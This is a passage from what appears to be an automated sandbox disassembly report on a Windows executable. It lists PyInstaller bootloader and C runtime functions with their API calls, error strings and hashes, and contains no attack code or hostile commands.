fseek, xrefs: 00007FF6A29B16E1
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6A29B16DA
Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF6A29B1742

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
API String ID: 2050909247-1550345328
Opcode ID: 607fb3d22e1abd3d0ea9d943795872ea3e60594e8e3d1f768179a624c21a25df
Instruction ID: d47d60451200b6bfc848e0532d6d9e2ab77ffb955b8ce996f5f3577a18d1f497
Opcode Fuzzy Hash: 607fb3d22e1abd3d0ea9d943795872ea3e60594e8e3d1f768179a624c21a25df
Instruction Fuzzy Hash: B8519A21B8A64692FA10AB63E4601A963A1BF44F9CF444131EE0C87B97DFBCF555B740

Function 00007FF6A29B8850 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNEL32(?,?,00000000,00007FF6A29B3CBB), ref: 00007FF6A29B88F4
GetCurrentProcessId.KERNEL32(?,00000000,00007FF6A29B3CBB), ref: 00007FF6A29B88FA
CreateDirectoryW.KERNELBASE(?,00000000,00007FF6A29B3CBB), ref: 00007FF6A29B893C

Part of subcall function 00007FF6A29B8A20: GetEnvironmentVariableW.KERNEL32(00007FF6A29B388E), ref: 00007FF6A29B8A57
Part of subcall function 00007FF6A29B8A20: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6A29B8A79

Part of subcall function 00007FF6A29C82A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29C82C1

Part of subcall function 00007FF6A29B2810: MessageBoxW.USER32 ref: 00007FF6A29B28EA

Strings

TMP, xrefs: 00007FF6A29B88B2
TMP, xrefs: 00007FF6A29B888C, 00007FF6A29B8993
LOADER: length of teporary directory path exceeds maximum path length!, xrefs: 00007FF6A29B896E
_MEI%d, xrefs: 00007FF6A29B8902
LOADER: failed to set the TMP environment variable., xrefs: 00007FF6A29B88CC

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
API String ID: 3563477958-1339014028
Opcode ID: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
Instruction ID: 373c8950d62d497dac01f4c9953196defd2f6d09158d483b887f0ea2bbc31112
Opcode Fuzzy Hash: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
Instruction Fuzzy Hash: BA41A012B9B64245FE11AB67A9552FA1291BF8DFC8F400031ED0DC779BDEBCE501A301

Function 00007FF6A29B1210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF6A29B12EF
Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF6A29B1276
malloc, xrefs: 00007FF6A29B12C1, 00007FF6A29B12F6
Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF6A29B141E
Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF6A29B12BA
1.3.1, xrefs: 00007FF6A29B1249

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: CurrentProcess
String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2050909247-2813020118
Opcode ID: 15fc9c742c9fb12a8c4ab664e8e5c311509e27342d3a39e207e1bde7a43e7c65
Instruction ID: 00d43df6436f02759240de2d845d39454300c9a40c99d6ae1f0535fa5bbe4620
Opcode Fuzzy Hash: 15fc9c742c9fb12a8c4ab664e8e5c311509e27342d3a39e207e1bde7a43e7c65
Instruction Fuzzy Hash: 6C51C322A4A64286EA609B13A4503BA6291FF85F98F844135ED4DC7BD7EFBCE501E700

Function 00007FF6A29CED80 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF6A29CF11A,?,?,-00000018,00007FF6A29CADC3,?,?,?,00007FF6A29CACBA,?,?,?,00007FF6A29C5FAE), ref: 00007FF6A29CEEFC
GetProcAddress.KERNEL32(?,?,?,00007FF6A29CF11A,?,?,-00000018,00007FF6A29CADC3,?,?,?,00007FF6A29CACBA,?,?,?,00007FF6A29C5FAE), ref: 00007FF6A29CEF08

Strings

ext-ms-, xrefs: 00007FF6A29CEE59
api-ms-, xrefs: 00007FF6A29CEE46

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
Instruction ID: e8aba44b315e9c6144e1426126274685ff4973418fb03f16126bd091c7a368a6
Opcode Fuzzy Hash: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
Instruction Fuzzy Hash: 66412361B9AA0245FA15CB1798106752291BF49FD8F884139ED5EC778AEEBCF804A300

Function 00007FF6A29B36B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,00007FF6A29B3804), ref: 00007FF6A29B36E1
GetLastError.KERNEL32(?,00007FF6A29B3804), ref: 00007FF6A29B36EB

Part of subcall function 00007FF6A29B2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6A29B3706,?,00007FF6A29B3804), ref: 00007FF6A29B2C9E
Part of subcall function 00007FF6A29B2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6A29B3706,?,00007FF6A29B3804), ref: 00007FF6A29B2D63
Part of subcall function 00007FF6A29B2C50: MessageBoxW.USER32 ref: 00007FF6A29B2D99

Strings

GetModuleFileNameW, xrefs: 00007FF6A29B36FA
\\?\, xrefs: 00007FF6A29B375A
Failed to obtain executable path., xrefs: 00007FF6A29B36F3
Failed to resolve full path to executable %ls., xrefs: 00007FF6A29B3739
Failed to convert executable path to UTF-8., xrefs: 00007FF6A29B3790

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
API String ID: 3187769757-2863816727
Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
Instruction ID: a38038be8dc44f9f10bcded8a5fb8c6cbd58bcb52eb1dff2abb6d5f16e8876be
Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
Instruction Fuzzy Hash: F421B661F9E64281FA20D722E8513BA2294FF88F9DF804136E55DC29D7EEACE504E704

Function 00007FF6A29CBACC Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29CBEF9

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 07c5dcf76cbe3182a9f46e495b791f87a2923bbe72b553d2f04cfdf557d03735
Instruction ID: c0caccf4c443a235cef339b66d8bafa4e06562aa49e1c3b48daffdc604db38c5
Opcode Fuzzy Hash: 07c5dcf76cbe3182a9f46e495b791f87a2923bbe72b553d2f04cfdf557d03735
Instruction Fuzzy Hash: 58C1F662A8E68649E7609B1790202BE7752EF80F88F554131EA4E837D3CFFCF855A340

Function 00007FF6A29B8760 Relevance: 10.6, APIs: 7, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF6A29B8780
OpenProcessToken.ADVAPI32 ref: 00007FF6A29B8793
GetTokenInformation.KERNELBASE ref: 00007FF6A29B87B8
GetLastError.KERNEL32 ref: 00007FF6A29B87C2
GetTokenInformation.KERNELBASE ref: 00007FF6A29B8802
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6A29B881E
CloseHandle.KERNEL32 ref: 00007FF6A29B8836

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID:
API String ID: 995526605-0
Opcode ID: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
Instruction ID: 41ece37a4328fe3f6e51a6a49f81d5a84e2f04b7c11ff0dbe27ce9ef364b58b6
Opcode Fuzzy Hash: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
Instruction Fuzzy Hash: 06217431B4D64242EB109B96F45423AA3E1FF85FA8F500235EA6D83AEADFFCD4449700

Function 00007FF6A29B90E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6A29B8760: GetCurrentProcess.KERNEL32 ref: 00007FF6A29B8780
Part of subcall function 00007FF6A29B8760: OpenProcessToken.ADVAPI32 ref: 00007FF6A29B8793
Part of subcall function 00007FF6A29B8760: GetTokenInformation.KERNELBASE ref: 00007FF6A29B87B8
Part of subcall function 00007FF6A29B8760: GetLastError.KERNEL32 ref: 00007FF6A29B87C2
Part of subcall function 00007FF6A29B8760: GetTokenInformation.KERNELBASE ref: 00007FF6A29B8802
Part of subcall function 00007FF6A29B8760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6A29B881E
Part of subcall function 00007FF6A29B8760: CloseHandle.KERNEL32 ref: 00007FF6A29B8836

LocalFree.KERNEL32(?,00007FF6A29B3C55), ref: 00007FF6A29B916C
LocalFree.KERNEL32(?,00007FF6A29B3C55), ref: 00007FF6A29B9175

Strings

S-1-3-4, xrefs: 00007FF6A29B9121
D:(A;;FA;;;%s), xrefs: 00007FF6A29B9157
Security descriptor string length exceeds PYI_PATH_MAX!, xrefs: 00007FF6A29B9183
D:(A;;FA;;;%s)(A;;FA;;;%s), xrefs: 00007FF6A29B9142

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
API String ID: 6828938-1529539262
Opcode ID: 44a76ac2d965b652da6d7152683ffc914eb32e79e00aec7a7a922ce7c9633e88
Instruction ID: 61ea2e333c8ae59a66370b6b33421511b738edf6cd7ec0991e42372fcaa7f86f
Opcode Fuzzy Hash: 44a76ac2d965b652da6d7152683ffc914eb32e79e00aec7a7a922ce7c9633e88
Instruction Fuzzy Hash: 9E218031A5A74286F710AB22E5152EA63A1FF88B88F444035EA4DD7787DFBCD805A750

Function 00007FF6A29CCFD0 Relevance: 6.2, APIs: 4, Instructions: 218
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6A29CCFBB), ref: 00007FF6A29CD0EC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6A29CCFBB), ref: 00007FF6A29CD177

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
Instruction ID: 522a9567aabdbeb78e2da34d8e5744d7ad4773fd4d8039c6315a57bc8951ac28
Opcode Fuzzy Hash: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
Instruction Fuzzy Hash: 6291D332F5A65289F754DF6694402BD2BA0BB44F8CF144139DE0E97B8ACEB8F452E710

Function 00007FF6A29C5698 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29C56C5
CreateFileW.KERNELBASE ref: 00007FF6A29C5704
CloseHandle.KERNEL32 ref: 00007FF6A29C5739

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
Instruction ID: af24e6ae04aa384eaf642277f0b4bd08a85d39d302fba75e2ac716e15e3b23bc
Opcode Fuzzy Hash: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
Instruction Fuzzy Hash: 0641B522E597828BF3149B22951037963A0FB94F98F109335EA5C53AD3DFBCB4E09700

Function 00007FF6A29BCCAC Relevance: 4.6, APIs: 3, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6A29BCE7C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF6A29BCE90

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF6A29BCCD0
__scrt_release_startup_lock.LIBCMT ref: 00007FF6A29BCD3E
__scrt_get_show_window_mode.LIBCMT ref: 00007FF6A29BCD91

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
String ID:
API String ID: 3251591375-0
Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
Instruction ID: c148c9aa73422208d980bb07c7718939a48255daa0e182e7742f38094fa45c89
Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
Instruction Fuzzy Hash: 8C314B24E8B1435AFA54AB2794253B916919F85F8CF440438E54DCB2D3DEECF805A250

Function 00007FF6A29C9AA0 Relevance: 4.5, APIs: 3, Instructions: 14COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF6A29C9A9C), ref: 00007FF6A29C9AB1
TerminateProcess.KERNEL32(?,?,?,00007FF6A29C9A9C), ref: 00007FF6A29C9ABC
ExitProcess.KERNEL32 ref: 00007FF6A29C9ACB

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
Instruction ID: d66be68a4f72fe4fcd21954ca78fa652fc8ce3084658814659761d7688d41448
Opcode Fuzzy Hash: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
Instruction Fuzzy Hash: 82D09214B8A7465BFB183B725DA907812966F5DF49F14143CC80B86393EDADB849B300

Function 00007FF6A29C01AC Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29C01F0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29C02E7

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
Instruction ID: 11bafb8702b7b25db2b9093d4a80d2cc83c0ff6dfd8ab14d6a58533e492f9852
Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
Instruction Fuzzy Hash: AA51C661B8F2514EEA289E67940067E6691AF44FACF144734DD6D87BCBCFBCF401A600

Function 00007FF6A29CC1A4 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,00007FF6A29CC33D), ref: 00007FF6A29CC1F0
GetLastError.KERNEL32(?,?,?,?,?,00007FF6A29CC33D), ref: 00007FF6A29CC1FA

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
Instruction ID: adb64a7c1b0ee9e0a91fff866cf25c4ab2f9d1114ce483fa9e1f659952c6bfb3
Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
Instruction Fuzzy Hash: 35112361B09B8185EA108B27E814169A761FB45FF8F644331EE7D8B7EACFBCE0119700

Function 00007FF6A29CA9B8 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,?,?,00007FF6A29D2D92,?,?,?,00007FF6A29D2DCF,?,?,00000000,00007FF6A29D3295,?,?,?,00007FF6A29D31C7), ref: 00007FF6A29CA9CE
GetLastError.KERNEL32(?,?,?,00007FF6A29D2D92,?,?,?,00007FF6A29D2DCF,?,?,00000000,00007FF6A29D3295,?,?,?,00007FF6A29D31C7), ref: 00007FF6A29CA9D8

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
Instruction ID: 59287f97f8006a3c6519f32283c540bd7f78ad61a05abe0c8558e97b0ce9b0b7
Opcode Fuzzy Hash: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
